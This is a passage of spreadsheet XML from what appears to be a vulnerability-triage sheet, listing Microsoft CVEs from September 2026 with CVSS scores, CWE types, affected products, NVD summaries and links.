      <c r="H186" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I186" s="5" t="inlineStr"/>
      <c r="J186" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K1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86" s="5" t="inlineStr"/>
      <c r="M186" s="5" t="inlineStr"/>
      <c r="N186" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O186" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P186" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q186" s="5" t="inlineStr"/>
      <c r="R186" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S186" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Media Player allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T186" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70203</t>
        </is>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B187" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C187" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70351</t>
        </is>
      </c>
      <c r="D187" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E187" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F187" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G187" s="5" t="inlineStr"/>
      <c r="H187" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I187" s="5" t="inlineStr"/>
      <c r="J187" s="5" t="inlineStr"/>
      <c r="K187" s="5" t="inlineStr"/>
      <c r="L187" s="5" t="inlineStr"/>
      <c r="M187" s="5" t="inlineStr"/>
      <c r="N187" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O187" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P187" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q187" s="5" t="inlineStr"/>
      <c r="R187" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S187" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Microsoft WebP Image Extension allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T187" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70351</t>
        </is>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B188" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C188" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70586</t>
        </is>
      </c>
      <c r="D188" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E188" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F188" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G188" s="5" t="inlineStr"/>
      <c r="H188" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I188" s="5" t="inlineStr"/>
      <c r="J188" s="5" t="inlineStr"/>
      <c r="K188" s="5" t="inlineStr"/>
      <c r="L188" s="5" t="inlineStr"/>
      <c r="M188" s="5" t="inlineStr"/>
      <c r="N188" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O188" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P188" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q188" s="5" t="inlineStr"/>
      <c r="R188" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S188" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Paint allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T188" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70586</t>
        </is>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B189" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C189" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71328</t>
        </is>
      </c>
      <c r="D189" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E189" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F189" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G189" s="5" t="inlineStr"/>
      <c r="H189" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I189" s="5" t="inlineStr"/>
      <c r="J189" s="5" t="inlineStr"/>
      <c r="K189" s="5" t="inlineStr">
        <is>
          <t>microsoft:.net, microsoft:visual_studio_2022, microsoft:visual_studio_2026, microsoft:windows</t>
        </is>
      </c>
      <c r="L189" s="5" t="inlineStr"/>
      <c r="M189" s="5" t="inlineStr"/>
      <c r="N189" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O189" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P189" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q189" s="5" t="inlineStr"/>
      <c r="R189" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S189" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T189" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71328</t>
        </is>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B190" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C190" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71336</t>
        </is>
      </c>
      <c r="D190" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E190" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F190" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G190" s="5" t="inlineStr"/>
      <c r="H190" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I190" s="5" t="inlineStr"/>
      <c r="J190" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K190" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L190" s="5" t="inlineStr"/>
      <c r="M190" s="5" t="inlineStr"/>
      <c r="N190" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O190" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P190" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="Q190" s="5" t="inlineStr"/>
      <c r="R190" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S190" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Work Folder Service allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T190" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71336</t>
        </is>
      </c>
    </row>
    <row r="191">
      <c r="A191" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B191" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C191" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71352</t>
        </is>
      </c>
      <c r="D191" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E191" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F191" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G191" s="5" t="inlineStr"/>
      <c r="H191" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I191" s="5" t="inlineStr"/>
      <c r="J191" s="5" t="inlineStr"/>
      <c r="K191" s="5" t="inlineStr"/>
      <c r="L191" s="5" t="inlineStr"/>
      <c r="M191" s="5" t="inlineStr"/>
      <c r="N191" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O191" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P191" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q191" s="5" t="inlineStr"/>
      <c r="R191" s="5" t="inlineStr">
        <is>
          <t>CWE-191</t>
        </is>
      </c>
      <c r="S191" s="5" t="inlineStr">
        <is>
          <t>Integer underflow (wrap or wraparound) in Windows Remote Access Connection Manager allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T191" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71352</t>
        </is>
      </c>
    </row>
    <row r="192">
      <c r="A192" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B192" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C192" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72933</t>
        </is>
      </c>
      <c r="D192" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E192" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F192" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G192" s="5" t="inlineStr"/>
      <c r="H192" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I192" s="5" t="inlineStr"/>
      <c r="J192" s="5" t="inlineStr"/>
      <c r="K192" s="5" t="inlineStr"/>
      <c r="L192" s="5" t="inlineStr"/>
      <c r="M192" s="5" t="inlineStr"/>
      <c r="N192" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O192" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P192" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q192" s="5" t="inlineStr"/>
      <c r="R192" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S192" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft WDAC OLE DB provider for SQL allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T192" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72933</t>
        </is>
      </c>
    </row>
    <row r="193">
      <c r="A193" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B193" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C193" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72940</t>
        </is>
      </c>
      <c r="D193" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E193" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F193" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G193" s="5" t="inlineStr"/>
      <c r="H193" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I193" s="5" t="inlineStr"/>
      <c r="J193" s="5" t="inlineStr"/>
      <c r="K193" s="5" t="inlineStr"/>
      <c r="L193" s="5" t="inlineStr"/>
      <c r="M193" s="5" t="inlineStr"/>
      <c r="N193" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O193" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P193" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q193" s="5" t="inlineStr"/>
      <c r="R193" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S193" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Schannel allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T193" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72940</t>
        </is>
      </c>
    </row>
    <row r="194">
      <c r="A194" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B194" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C194" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72950</t>
        </is>
      </c>
      <c r="D194" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E194" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F194" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G194" s="5" t="inlineStr"/>
      <c r="H194" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I194" s="5" t="inlineStr"/>
      <c r="J194" s="5" t="inlineStr"/>
      <c r="K194" s="5" t="inlineStr"/>
      <c r="L194" s="5" t="inlineStr"/>
      <c r="M194" s="5" t="inlineStr"/>
      <c r="N194" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O194" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P194" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q194" s="5" t="inlineStr"/>
      <c r="R194" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S194" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="T194" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72950</t>
        </is>
      </c>
    </row>
    <row r="195">
      <c r="A195" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B195" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C195" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72959</t>
        </is>
      </c>
      <c r="D195" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E195" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F195" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G195" s="5" t="inlineStr"/>
      <c r="H195" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I195" s="5" t="inlineStr"/>
      <c r="J195" s="5" t="inlineStr"/>
      <c r="K195" s="5" t="inlineStr"/>
      <c r="L195" s="5" t="inlineStr"/>
      <c r="M195" s="5" t="inlineStr"/>
      <c r="N195" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O195" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P195" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q195" s="5" t="inlineStr"/>
      <c r="R195" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S195" s="5" t="inlineStr">
        <is>
          <t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t>
        </is>
      </c>
      <c r="T195" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72959</t>
        </is>
      </c>
    </row>
    <row r="196">
      <c r="A196" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B196" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C196" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72960</t>
        </is>
      </c>
      <c r="D196" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E196" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F196" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G196" s="5" t="inlineStr"/>
      <c r="H196" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I196" s="5" t="inlineStr"/>
      <c r="J196" s="5" t="inlineStr"/>
      <c r="K196" s="5" t="inlineStr"/>
      <c r="L196" s="5" t="inlineStr"/>
      <c r="M196" s="5" t="inlineStr"/>
      <c r="N196" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O196" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P196" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q196" s="5" t="inlineStr"/>
      <c r="R196" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S196" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Media Player allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T196" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72960</t>
        </is>
      </c>
    </row>
    <row r="197">
      <c r="A197" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B197" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C197" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72972</t>
        </is>
      </c>
      <c r="D197" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E197" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F197" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G197" s="5" t="inlineStr"/>
      <c r="H197" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I197" s="5" t="inlineStr"/>
      <c r="J197" s="5" t="inlineStr"/>
      <c r="K197" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L197" s="5" t="inlineStr"/>
      <c r="M197" s="5" t="inlineStr"/>
      <c r="N197" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O197" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P197" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q197" s="5" t="inlineStr"/>
      <c r="R197" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S197" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T197" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72972</t>
        </is>
      </c>
    </row>
    <row r="198">
      <c r="A198" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B198" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C198" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72973</t>
        </is>
      </c>
      <c r="D198" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E198" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F198" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G198" s="5" t="inlineStr"/>
      <c r="H198" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I198" s="5" t="inlineStr"/>
      <c r="J198" s="5" t="inlineStr"/>
      <c r="K198" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L198" s="5" t="inlineStr"/>
      <c r="M198" s="5" t="inlineStr"/>
      <c r="N198" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O198" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P198" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q198" s="5" t="inlineStr"/>
      <c r="R198" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S198" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T198" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72973</t>
        </is>
      </c>
    </row>
    <row r="199">
      <c r="A199" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B199" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C199" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72986</t>
        </is>
      </c>
      <c r="D199" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E199" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F199" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G199" s="5" t="inlineStr"/>
      <c r="H199" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I199" s="5" t="inlineStr"/>
      <c r="J199" s="5" t="inlineStr"/>
      <c r="K199" s="5" t="inlineStr"/>
      <c r="L199" s="5" t="inlineStr"/>
      <c r="M199" s="5" t="inlineStr"/>
      <c r="N199" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O199" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P199" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q199" s="5" t="inlineStr"/>
      <c r="R199" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="S199" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Graphic Fonts allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T199" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72986</t>
        </is>
      </c>
    </row>
    <row r="200">
      <c r="A200" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B200" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C200" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73006</t>
        </is>
      </c>
      <c r="D200" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E200" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F200" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G200" s="5" t="inlineStr"/>
      <c r="H200" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I200" s="5" t="inlineStr"/>
      <c r="J200" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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0" s="5" t="inlineStr"/>
      <c r="M200" s="5" t="inlineStr"/>
      <c r="N200" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O200" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P200" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q200" s="5" t="inlineStr"/>
      <c r="R200" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S200" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Graphics Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73006</t>
        </is>
      </c>
    </row>
    <row r="201">
      <c r="A201" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B201" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73012</t>
        </is>
      </c>
      <c r="D201" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E201" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F201" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G201" s="5" t="inlineStr"/>
      <c r="H201" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I201" s="5" t="inlineStr"/>
      <c r="J201" s="5" t="inlineStr"/>
      <c r="K201" s="5" t="inlineStr"/>
      <c r="L201" s="5" t="inlineStr"/>
      <c r="M201" s="5" t="inlineStr"/>
      <c r="N201" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O201" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P201" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q201" s="5" t="inlineStr"/>
      <c r="R201" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S201" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Management Services allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73012</t>
        </is>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B202" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73013</t>
        </is>
      </c>
      <c r="D202" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E202" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F202" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G202" s="5" t="inlineStr"/>
      <c r="H202" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I202" s="5" t="inlineStr"/>
      <c r="J202" s="5" t="inlineStr"/>
      <c r="K202" s="5" t="inlineStr"/>
      <c r="L202" s="5" t="inlineStr"/>
      <c r="M202" s="5" t="inlineStr"/>
      <c r="N202" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O202" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P202" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q202" s="5" t="inlineStr"/>
      <c r="R202" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S202" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="T202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73013</t>
        </is>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B203" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73016</t>
        </is>
      </c>
      <c r="D203" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E203" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F203" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G203" s="5" t="inlineStr"/>
      <c r="H203" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I203" s="5" t="inlineStr"/>
      <c r="J203" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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03" s="5" t="inlineStr"/>
      <c r="M203" s="5" t="inlineStr"/>
